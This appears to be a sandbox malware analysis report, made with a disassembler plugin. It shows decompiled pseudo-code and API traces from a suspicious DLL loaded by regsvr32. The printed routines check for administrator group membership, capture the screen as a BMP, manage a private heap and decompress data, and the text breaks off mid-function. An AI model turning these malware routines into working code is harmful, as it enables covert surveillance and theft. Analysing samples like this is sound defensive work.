            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID:
            • API String ID: 4133054770-0
            • Opcode ID: 7cd5fab72424ff680ac461528a9bb260ea8c5518e1d82b3cf0e991f840f729e5
            • Instruction ID: 890c7a4f13503504021de620f167a4b685e08f03ff4c863cf19e6cd15ffb1ede
            • Opcode Fuzzy Hash: 7cd5fab72424ff680ac461528a9bb260ea8c5518e1d82b3cf0e991f840f729e5
            • Instruction Fuzzy Hash: 16F0A772310214ABC708EBE9E84485AB7FD9F4C291B15417AF006D7240DFB08D9287A0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 47%
            			E0316CA5A(void* __ecx, void* __esi) {
            				intOrPtr* _v8;
            				char _v12;
            				void* _v16;
            				char _v20;
            				char _v24;
            				short _v28;
            				char _v32;
            				void* _t20;
            				intOrPtr* _t21;
            				intOrPtr _t29;
            				intOrPtr _t31;
            				intOrPtr* _t33;
            				intOrPtr _t34;
            				char _t37;
            				union _TOKEN_INFORMATION_CLASS _t44;
            				char _t45;
            				intOrPtr* _t48;
            
            				_t37 = 0;
            				_v28 = 0x500;
            				_t45 = 0;
            				_v32 = 0;
            				_t20 = E0316C92F(__ecx);
            				_v16 = _t20;
            				if(_t20 != 0) {
            					_push( &_v24);
            					_t44 = 2;
            					_t21 = E0316C986(_t44); // executed
            					_t48 = _t21;
            					_v20 = _t48;
            					if(_t48 == 0) {
            						L10:
            						FindCloseChangeNotification(_v16);
            						if(_t48 != 0) {
            							E03168DDF( &_v20, _t37);
            						}
            						return _t45;
            					}
            					// Eleven arguments in AllocateAndInitializeSid order (inferred from the argument layout; the call goes through the API table at 0x317f8d8):
            					// &authority, 2 sub-authorities, 0x20 (SECURITY_BUILTIN_DOMAIN_RID), 0x220 (DOMAIN_ALIAS_RID_ADMINS), six zeros, &_v12.
            					// The resulting SID is S-1-5-32-544, BUILTIN\Administrators.
            					_push( &_v12);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0x220);
            					_push(0x20);
            					_push(2);
            					_push( &_v32);
            					_t29 =  *0x317f8d8; // 0x4fafab0
            					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
            						goto L10;
            					}
            					if( *_t48 <= 0) { // TOKEN_GROUPS.GroupCount
            						L9:
            						_t31 =  *0x317f8d8; // 0x4fafab0
            						 *((intOrPtr*)(_t31 + 0x10))(_v12); // releases the SID built above (FreeSid slot, inferred from usage)
            						_t37 = 0;
            						goto L10;
            					}
            					_t9 = _t48 + 4; // 0x4: &TOKEN_GROUPS.Groups[0]; each SID_AND_ATTRIBUTES entry is 8 bytes, hence the +8 stride below
            					_t33 = _t9;
            					_v8 = _t33;
            					while(1) {
            						_push(_v12);
            						_push( *_t33);
            						_t34 =  *0x317f8d8; // 0x4fafab0
            						if( *((intOrPtr*)(_t34 + 0x68))() != 0) { // compares the group SID with the Administrators SID (EqualSid-style call through the API table, inferred); non-zero means a match
            							break;
            						}
            						_t37 = _t37 + 1;
            						_t33 = _v8 + 8;
            						_v8 = _t33;
            						if(_t37 <  *_t48) {
            							continue;
            						}
            						goto L9;
            					}
            					_t45 = 1; // the token holds BUILTIN\Administrators: the caller learns whether the process has admin group membership
            					goto L9;
            				}
            				return _t20;
            			}

            APIs
              • Part of subcall function 0316C92F: GetCurrentThread.KERNEL32 ref: 0316C942
              • Part of subcall function 0316C92F: OpenThreadToken.ADVAPI32(00000000,?,?,0316CA74,00000000,03160000), ref: 0316C949
              • Part of subcall function 0316C92F: GetLastError.KERNEL32(?,?,0316CA74,00000000,03160000), ref: 0316C950
              • Part of subcall function 0316C92F: OpenProcessToken.ADVAPI32(00000000,?,?,0316CA74,00000000,03160000), ref: 0316C975
              • Part of subcall function 0316C986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,03160000,00000000,00000000,?,0316CA07,00000000,00000000,?,0316CA30), ref: 0316C9A1
              • Part of subcall function 0316C986: GetLastError.KERNEL32(?,0316CA07,00000000,00000000,?,0316CA30,00001644,?,0316E053), ref: 0316C9A8
            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,03160000), ref: 0316CAFE
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
            • String ID:
            • API String ID: 1806447117-0
            • Opcode ID: 7960cfc6c846f044df7e6647f943c07f521807184c2b0980e74d4e8ca9c5c3c3
            • Instruction ID: c3f5e28f84aebfe1a77e322c0b08ee5e993648b1a28cf9e434592b68045d87c8
            • Opcode Fuzzy Hash: 7960cfc6c846f044df7e6647f943c07f521807184c2b0980e74d4e8ca9c5c3c3
            • Instruction Fuzzy Hash: 7E214F32A00205AFDB10EFE9DC85AAEF7F8FF4C700B184469E541E7291E77099519BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph (rendered graph omitted; node and edge data not reproduced)
            C-Code - Quality: 100%
            			E031663A2(void* __fp0) {
            				void* __ecx;
            				intOrPtr _t13;
            				intOrPtr _t14;
            				signed int _t16;
            				intOrPtr _t17;
            				intOrPtr _t20;
            				void* _t25;
            				void* _t27;
            
            				_t32 = __fp0;
            				E0316651E();
            				GetOEMCP();
            				_t13 = E0316DFC2(__fp0); // executed
            				 *0x317f8d4 = _t13;
            				if(_t13 != 0) {
            					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
            					_t14 =  *0x317f8d4; // 0x4fafc00
            					_t2 = _t14 + 0x224; // 0x3160000
            					E03173C36( *_t2);
            					_t26 =  *0x317f8d4; // 0x4fafc00
            					_t25 = _t27;
            					__eflags =  *(_t26 + 0x1898) & 0x00010000;
            					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
            						_t7 = _t26 + 0x224; // 0x3160000, executed
            						_t26 =  *_t7;
            						_t16 = E0316D889( *_t7); // executed
            						__eflags = _t16;
            						_t17 =  *0x317f8d4; // 0x4fafc00
            						if(_t16 != 0) {
            							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
            							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
            								L10:
            								__eflags = 0;
            								return 0;
            							}
            							L9:
            							E03163597();
            							goto L10;
            						}
            						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
            						L6:
            						_t20 =  *0x317f8d4; // 0x4fafc00
            						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
            						if(__eflags == 0) {
            							goto L9;
            						}
            						E031661E8(_t25, _t26, __eflags, _t32);
            						goto L10;
            					}
            					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
            					goto L6;
            				}
            				return _t13 + 1;
            			}

            APIs
            • GetOEMCP.KERNEL32 ref: 031663A7
              • Part of subcall function 0316DFC2: GetCurrentProcessId.KERNEL32 ref: 0316DFE9
              • Part of subcall function 0316DFC2: GetLastError.KERNEL32 ref: 0316E0E3
              • Part of subcall function 0316DFC2: GetSystemMetrics.USER32(00001000), ref: 0316E0F3
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CurrentErrorLastMetricsProcessSystem
            • String ID:
            • API String ID: 1196160345-0
            • Opcode ID: a101dc125c1b8ebb113911b7130c5d617f7b443f0c4545930a68b39b2f758ef6
            • Instruction ID: 3d5d21272fc906caad4fb871d73a9dd129fa9299fb97fd34e16a10658d774872
            • Opcode Fuzzy Hash: a101dc125c1b8ebb113911b7130c5d617f7b443f0c4545930a68b39b2f758ef6
            • Instruction Fuzzy Hash: 9001E8792092529FC718FBA8E908AA6B7E8EF5D310F1D45B6E1488A155C77084F1CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0316CA0A(void* __ecx) {
            				signed int _v8;
            				intOrPtr _t12;
            				void* _t13;
            				void* _t14;
            				void* _t17;
            				intOrPtr _t18;
            				void* _t23;
            
            				_v8 = _v8 & 0x00000000;
            				_t12 =  *0x317f8d8; // 0x4fafab0
            				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
            				if(_t13 != 0) {
            					_t14 = E0316C9F3(); // executed
            					_t23 = _t14;
            					if(_t23 != 0) {
            						FindCloseChangeNotification(_v8);
            						_t17 = _t23;
            					} else {
            						if(_v8 != _t14) {
            							_t18 =  *0x317f8d0; // 0x4faf8c0
            							 *((intOrPtr*)(_t18 + 0x30))(_v8);
            						}
            						_t17 = 0;
            					}
            					return _t17;
            				} else {
            					return _t13;
            				}
            			}

            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7d68bb2799ace0f4e19537943af777b8b63557d5b530b498cf5cff5cef635c0f
            • Instruction ID: 4e1628f99d045f0204ffcb3e67eceab80be7dc8ee4f78dd730a5f611370eaa28
            • Opcode Fuzzy Hash: 7d68bb2799ace0f4e19537943af777b8b63557d5b530b498cf5cff5cef635c0f
            • Instruction Fuzzy Hash: D3F01731A11215EFCB14EBA8C945A9EB3F8BF0C345F0990A4E541E7150E774DA50DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E03166438() {
            				intOrPtr _t3;
            
            				_t3 =  *0x317f8d0; // 0x4faf8c0
            				 *((intOrPtr*)(_t3 + 0x2c))( *0x317f8f4, 0xffffffff); // waits on the handle stored at 0x317f8f4 with timeout INFINITE (0xffffffff) through the API table (WaitForSingleObject-style call, inferred from the arguments)
            				ExitProcess(0); // then terminates the process
            			}

            APIs
            • ExitProcess.KERNEL32(00000000), ref: 0316644F
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: 6e736ed74219f03a5763812307a57609ee06db5e17556fc234953ed1cb9e46a4
            • Instruction ID: 320625cc765fe1616611c77c4ca6b82f2340ab60b5c0293f3634e9764c8b5793
            • Opcode Fuzzy Hash: 6e736ed74219f03a5763812307a57609ee06db5e17556fc234953ed1cb9e46a4
            • Instruction Fuzzy Hash: 1AC002712181519FC748BB64D949F1637F0BF0C322F1D86A5F6299A1EDCA2094A19B20
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E03168DC9(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x317f9b8, 8, _a4); // executed; flags 8 = HEAP_ZERO_MEMORY, allocating from the private heap created by E03168DB4
            				return _t2;
            			}

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,?,03169793,00000100,?,0316661B), ref: 03168DD7
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: f2c0d3fe7894a1254c4f66324bff2c841299b8f43b15fc36e99ab48fe695dbb0
            • Instruction ID: bf91f1df1451ef6f6f8f44baa4d02c9ceac1c44387818a58175f60054c2c78ba
            • Opcode Fuzzy Hash: f2c0d3fe7894a1254c4f66324bff2c841299b8f43b15fc36e99ab48fe695dbb0
            • Instruction Fuzzy Hash: 54B0923A08020CBBCF452A81EC05A857F3DFB0C651F444010F608480648B6365A69BA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E0316DADC(void* __ecx) {
            				signed int _t4;
            
            				_t4 = ResumeThread( *(__ecx + 4));
            				asm("sbb eax, eax");
            				return  ~_t4 & 0x00000001;
            			}

            APIs
            • ResumeThread.KERNELBASE(?,0316D947,?,?,00000001), ref: 0316DAE4
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: e9e8db0eda4e8c66ff9618fdfb1cb18a03dbf6627894a52a5308674317bf305e
            • Instruction ID: b83412d7be8b49df41b8c864ccd48cb9e10c0dbe5c5ece7bb5ebca1009ecffc8
            • Opcode Fuzzy Hash: e9e8db0eda4e8c66ff9618fdfb1cb18a03dbf6627894a52a5308674317bf305e
            • Instruction Fuzzy Hash: ADB092322A00019BCB006B74D80A9A03BE0BB5A606B9CC2E4A015C60A5C22AC4968B40
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E03168DB4() {
            				void* _t1;
            
            				_t1 = HeapCreate(0, 0x96000, 0); // executed; private growable heap with a 0x96000-byte (600 KiB) initial size, stored in the global used by E03168DC9
            				 *0x317f9b8 = _t1;
            				return _t1;
            			}

            APIs
            • HeapCreate.KERNELBASE(00000000,00096000,00000000,03166616), ref: 03168DBD
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: 0c8c30f73c354ee2f08f09b9843f856ec03c8a8d7037a903a6e1bc28d345b537
            • Instruction ID: ec16c63047cfcfc621537bb4a8aa27a6bb18fdfcaaae59af74a85aec57cb1d58
            • Opcode Fuzzy Hash: 0c8c30f73c354ee2f08f09b9843f856ec03c8a8d7037a903a6e1bc28d345b537
            • Instruction Fuzzy Hash: 54B01270695300A6DB542B205C46B017530634CB02F240005B609981C8C7B010819934
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 91%
            			E0316DAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
            				signed int _v8;
            				intOrPtr _v12;
            				signed int _t26;
            				signed int _t28;
            				signed int* _t36;
            				signed int* _t39;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t36 = _a8;
            				_t28 = _t36[1];
            				if(_t28 != 0) {
            					_t39 = _t36[2];
            					do {
            						_a8 = _a8 & 0x00000000;
            						if(_t39[2] > 0) {
            							_t31 = _t39[3];
            							_t22 = _a4 + 0x24;
            							_v12 = _a4 + 0x24;
            							_v8 = _t39[3];
            							while(E0316A236(_t22,  *_t31) != 0) {
            								_t26 = _a8 + 1;
            								_t31 = _v8 + 4;
            								_a8 = _t26;
            								_t22 = _v12;
            								_v8 = _v8 + 4;
            								if(_t26 < _t39[2]) {
            									continue;
            								} else {
            								}
            								goto L8;
            							}
            							 *_t36 =  *_t36 |  *_t39;
            						}
            						L8:
            						_t39 =  &(_t39[4]);
            						_t28 = _t28 - 1;
            					} while (_t28 != 0);
            				}
            				Sleep(0xa);
            				return 1;
            			}

            APIs
            • Sleep.KERNELBASE(0000000A), ref: 0316DB5B
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: e83c2ce7c4c5b9b0ffb6cf622e20ae9705da0a153e3f5cf890ced7ddc6877279
            • Instruction ID: 50b4f966d2a26b1bc90cff73dbbec3e8f909b8e4624a98234e1ba869ed5d3094
            • Opcode Fuzzy Hash: e83c2ce7c4c5b9b0ffb6cf622e20ae9705da0a153e3f5cf890ced7ddc6877279
            • Instruction Fuzzy Hash: 55111771A00305AFEB14CFA9D484AA9B7F8FF4A224F14846DE95A9B344D370E9A1CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E03165D1E(int* __ecx) {
            				signed int _v8;
            				char _v12;
            				int _v16;
            				struct HWND__* _v20;
            				struct HWND__* _v24;
            				struct HDC__* _v28;
            				void* _v32;
            				int* _v36;
            				void* _v40;
            				void* _v44;
            				void* _v48;
            				void* _v52;
            				void* _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				short _v82;
            				short _v84;
            				signed int _v88;
            				signed int _v92;
            				struct tagBITMAPINFO _v96;
            				intOrPtr _v102;
            				int _v110;
            				char _v112;
            				void* _v116;
            				void* _v120;
            				void* _v124;
            				void* _v132;
            				void* _v136;
            				void* _v140;
            				int _v156;
            				signed int _v160;
            				void _v164;
            				int _t82;
            				void* _t84;
            				signed int _t92;
            				void* _t99;
            				char _t103;
            				intOrPtr _t113;
            				int* _t114;
            				struct HDC__* _t120;
            				signed int _t124;
            				short _t137;
            				struct HDC__* _t141;
            				void* _t144;
            				void* _t148;
            
            				_v36 = __ecx;
            				_v24 = 0;
            				_t120 = 0;
            				_v12 = 0;
            				_t144 = 0;
            				_v20 = 0;
            				_t141 = GetDC(0); // screen DC; the APIs list below also records BitBlt, GetCursorInfo, CopyIcon, GetIconInfo and DrawIconEx calls in this function that the decompiled listing omits (screen copy plus cursor overlay, inferred)
            				_v28 = _t141;
            				if(_t141 != 0) {
            					_t120 = CreateCompatibleDC(_t141);
            					if(_t120 != 0) {
            						_v8 = GetDeviceCaps(_t141, 8);
            						_t82 = GetDeviceCaps(_t141, 0xa);
            						_v16 = _t82;
            						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
            						if(_t144 != 0) {
            							_t84 = SelectObject(_t120, _t144);
            							_v32 = _t84;
            							if(_t84 != 0) {
            								_t144 = SelectObject(_t120, _v32);
            								if(_t144 != 0) {
            									GetObjectW(_t144, 0x18,  &_v164);
            									_t92 = _v160;
            									_t124 = _v156;
            									_v92 = _t92; // biWidth
            									_v84 = 1; // biPlanes
            									_t137 = 0x20;
            									_v82 = _t137; // biBitCount = 32
            									_v96.bmiHeader = 0x28; // biSize = sizeof(BITMAPINFOHEADER)
            									_v80 = 0;
            									_v76 = 0;
            									_v72 = 0;
            									_v68 = 0;
            									_v64 = 0;
            									_v60 = 0;
            									asm("cdq");
            									_v88 = _t124; // biHeight
            									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2; // DIB size: 32 bpp scanline rounded up to a DWORD boundary, times height
            									_t99 = E03168DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2); // zeroed buffer from the private heap
            									_v20 = _t99;
            									if(_t99 != 0) {
            										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0); // copies all scanlines of the captured bitmap into the buffer; last argument 0 = DIB_RGB_COLORS
            										_v16 = _v8 + 0x36;
            										_t103 = E03168DC9(_v8 + 0x36);
            										_v12 = _t103;
            										if(_t103 != 0) {
            											_v110 = _v16; // BITMAPFILEHEADER.bfSize = pixel data + 0x36 bytes of headers
            											_v112 = 0x4d42; // bfType 'BM', the bitmap file signature
            											_v102 = 0x36; // bfOffBits: 14-byte file header + 40-byte BITMAPINFOHEADER
            											// Assembles a complete .bmp image in memory: file header, info header, then the pixel data (E03168EA6 used as a copy routine, inferred from its arguments)
            											E03168EA6(_t103,  &_v112, 0xe);
            											E03168EA6(_v12 + 0xe,  &_v96, 0x28);
            											E03168EA6(_v12 + 0x36, _v20, _v8);
            											_t148 = _t148 + 0x24;
            											_v8 = _v8 & 0x00000000;
            											_t113 = E0316FBFB(_v12, _v16,  &_v8);
            											_v24 = _t113;
            											if(_t113 != 0) {
            												_t114 = _v36;
            												if(_t114 != 0) {
            													 *_t114 = _v8;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				E03168DDF( &_v20, 0);
            				E03168DDF( &_v12, 0);
            				if(_t120 != 0) {
            					DeleteDC(_t120);
            				}
            				if(_t141 != 0) {
            					DeleteDC(_t141);
            				}
            				if(_t144 != 0) {
            					DeleteObject(_t144);
            				}
            				return _v24;
            			}

            APIs
            • GetDC.USER32(00000000), ref: 03165D3D
            • CreateCompatibleDC.GDI32(00000000), ref: 03165D51
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 03165D6A
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 03165D72
            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 03165D7C
            • SelectObject.GDI32(00000000,00000000), ref: 03165D8E
            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 03165DB2
            • GetCursorInfo.USER32(?), ref: 03165DC3
            • CopyIcon.USER32 ref: 03165DD8
            • GetIconInfo.USER32(00000000,?), ref: 03165DE6
            • GetObjectW.GDI32(?,00000018,?), ref: 03165E04
            • DrawIconEx.USER32 ref: 03165E1C
            • SelectObject.GDI32(00000000,?), ref: 03165E29
            • GetObjectW.GDI32(00000000,00000018,?), ref: 03165E43
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 03165EBF
            • DeleteDC.GDI32(00000000), ref: 03165F70
            • DeleteDC.GDI32(00000000), ref: 03165F7B
            • DeleteObject.GDI32(00000000), ref: 03165F86
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
            • String ID: ($6
            • API String ID: 192358524-4149066357
            • Opcode ID: 695915fb7b3f136d0e5a918ff4b12aae79ef08a035979b2339222bebfa18cbdb
            • Instruction ID: d27d3414db8bb74b535fa05462435d9d7eb8698156137f459216fa18edb387cb
            • Opcode Fuzzy Hash: 695915fb7b3f136d0e5a918ff4b12aae79ef08a035979b2339222bebfa18cbdb
            • Instruction Fuzzy Hash: 23811AB5D00219ABDB24DBE4DC49BAEBBBDFF49300F148069E504F7244EB309A55CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			E0317676F(void* __edi) {
            				signed int _t164;
            				unsigned int _t172;
            				unsigned int _t173;
            				signed int _t174;
            				signed int _t176;
            				signed int _t178;
            				signed int _t179;
            				signed int _t182;
            				signed int _t184;
            				unsigned int _t185;
            				int _t186;
            				int _t194;
            				signed char _t200;
            				signed int _t207;
            				signed int _t208;
            				signed int _t209;
            				int _t210;
            				int _t222;
            				signed int _t227;
            				signed int _t235;
            				signed int _t251;
            				signed char _t252;
            				unsigned int _t253;
            				signed char _t254;
            				signed int* _t255;
            				signed int _t258;
            				signed int _t259;
            				signed int _t260;
            				signed int _t266;
            				intOrPtr _t271;
            				signed char _t278;
            				signed int _t279;
            				char* _t280;
            				signed int _t282;
            				signed char _t284;
            				signed int _t287;
            				signed int _t291;
            				int _t292;
            				int _t293;
            				int _t296;
            				int _t298;
            				int _t302;
            				signed int _t305;
            				signed char _t311;
            				signed char _t312;
            				signed char _t315;
            				signed char _t316;
            				signed int _t318;
            				int _t319;
            				int _t320;
            				signed char _t322;
            				int _t324;
            				int _t326;
            				int _t330;
            				signed int _t333;
            				signed char _t336;
            				signed char _t337;
            				signed char _t339;
            				int _t341;
            				signed int _t347;
            				int _t349;
            				intOrPtr _t350;
            				intOrPtr _t351;
            				unsigned int _t356;
            				unsigned int _t361;
            				signed int _t364;
            				signed int _t365;
            				intOrPtr _t367;
            				void* _t368;
            				intOrPtr* _t380;
            				void* _t381;
            				intOrPtr* _t389;
            				void* _t390;
            				signed int _t395;
            				void* _t396;
            				signed int _t397;
            				void* _t403;
            				void* _t405;
            				intOrPtr* _t412;
            				void* _t413;
            				signed int _t414;
            				void* _t416;
            				intOrPtr* _t423;
            				void* _t424;
            				unsigned int _t430;
            				signed int _t431;
            				void* _t434;
            				signed int* _t435;
            				void* _t439;
            
            				 *((intOrPtr*)(__edi + 0x56))();
            				asm("pushfd");
            				_t435 = _t434 - 0x40;
            				asm("cld");
            				_t395 = _t435[0x16];
            				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
            				_t164 =  *_t395;
            				_t435[0xb] = _t164;
            				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
            				_t271 =  *((intOrPtr*)(_t395 + 0x10));
            				_t251 =  *(_t395 + 0xc);
            				_t435[0xf] = _t251;
            				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
            				_t435[4] = _t271 - 0x101 + _t251;
            				_t435[2] =  *(_t367 + 0x4c);
            				_t435[3] =  *(_t367 + 0x50);
            				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
            				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
            				_t172 =  *(_t367 + 0x28);
            				_t347 =  *(_t367 + 0x34);
            				_t435[0xd] = _t172;
            				_t435[0xc] =  *(_t367 + 0x30);
            				_t435[0xe] = _t347;
            				_t430 =  *(_t367 + 0x38);
            				_t252 =  *(_t367 + 0x3c);
            				_t396 = _t435[0xb];
            				_t278 = _t435[5];
            				if(_t278 > _t396) {
            					L2:
            					if((_t396 & 0x00000003) != 0) {
            						_t396 = _t396 + 1;
            						_t278 = _t252;
            						_t252 = _t252 + 8;
            						_t172 = 0 << _t278;
            						_t430 = _t430 | _t172;
            						goto L2;
            					}
            					goto L4;
            				} else {
            					_t341 = _t278 + 0xb - _t396;
            					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
            					_t435 =  &(_t435[6]);
            					_t278 = 0;
            					_t396 =  &(_t435[7]);
            					_t435[5] = _t396;
            					L4:
            					_t368 = _t435[0xf];
            					while(1) {
            						_t439 =  *0x317e040 - 2;
            						if(_t439 == 0) {
            							break;
            						}
            						if(_t439 > 0) {
            							do {
            								if(_t252 <= 0xf) {
            									asm("lodsw");
            									_t322 = _t252;
            									_t252 = _t252 + 0x10;
            									_t430 = _t431 | 0 << _t322;
            								}
            								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
            								while(1) {
            									_t253 = _t252 - _t173;
            									_t431 = _t430 >> _t173;
            									if(_t173 == 0) {
            										asm("stosb");
            										goto L22;
            									}
            									_t356 = _t173 >> 0x10;
            									_t311 = _t173;
            									if((_t173 & 0x00000010) == 0) {
            										if((_t173 & 0x00000040) != 0) {
            											L97:
            											if((_t173 & 0x00000020) == 0) {
            												_t280 = "invalid literal/length code";
            												_t350 = 0x1a;
            											} else {
            												_t280 = 0;
            												_t350 = 0xb;
            											}
            											L101:
            											_t174 = _t435[0x16];
            											if(_t280 != 0) {
            												 *(_t174 + 0x18) = _t280;
            											}
            											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
            											goto L104;
            										}
            										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
            										continue;
            									}
            									_t312 = _t311 & 0x0000000f;
            									if(_t312 != 0) {
            										if(_t253 < _t312) {
            											asm("lodsw");
            											_t339 = _t253;
            											_t253 = _t253 + 0x10;
            											_t431 = _t431 | 0 << _t339;
            											_t312 = _t339;
            										}
            										_t253 = _t253 - _t312;
            										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
            										_t431 = _t431 >> _t312;
            										_t356 = _t356 + _t235;
            									}
            									_t435[6] = _t356;
            									if(_t253 <= 0xf) {
            										asm("lodsw");
            										_t337 = _t253;
            										_t253 = _t253 + 0x10;
            										_t431 = _t431 | 0 << _t337;
            									}
            									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
            									while(1) {
            										_t361 = _t200 >> 0x10;
            										_t253 = _t253 - _t200;
            										_t431 = _t431 >> _t200;
            										_t315 = _t200;
            										if((_t200 & 0x00000010) != 0) {
            											break;
            										}
            										if((_t200 & 0x00000040) != 0) {
            											L96:
            											_t280 = "invalid distance code";
            											_t350 = 0x1a;
            											goto L101;
            										}
            										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
            									}
            									_t316 = _t315 & 0x0000000f;
            									if(_t316 == 0) {
            										if(_t361 != 1 || _t435[0xa] == _t368) {
            											L38:
            											_t435[0xb] = _t396;
            											_t207 = _t368 - _t435[0xa];
            											if(_t207 < _t361) {
            												_t208 = _t435[0xd];
            												_t318 =  ~_t207;
            												_t414 = _t435[0xe];
            												if(_t208 < _t361) {
            													L100:
            													_t396 = _t435[0xb];
            													_t280 = "invalid distance too far back";
            													_t350 = 0x1a;
            													goto L101;
            												}
            												_t319 = _t318 + _t361;
            												if(_t435[0xc] != 0) {
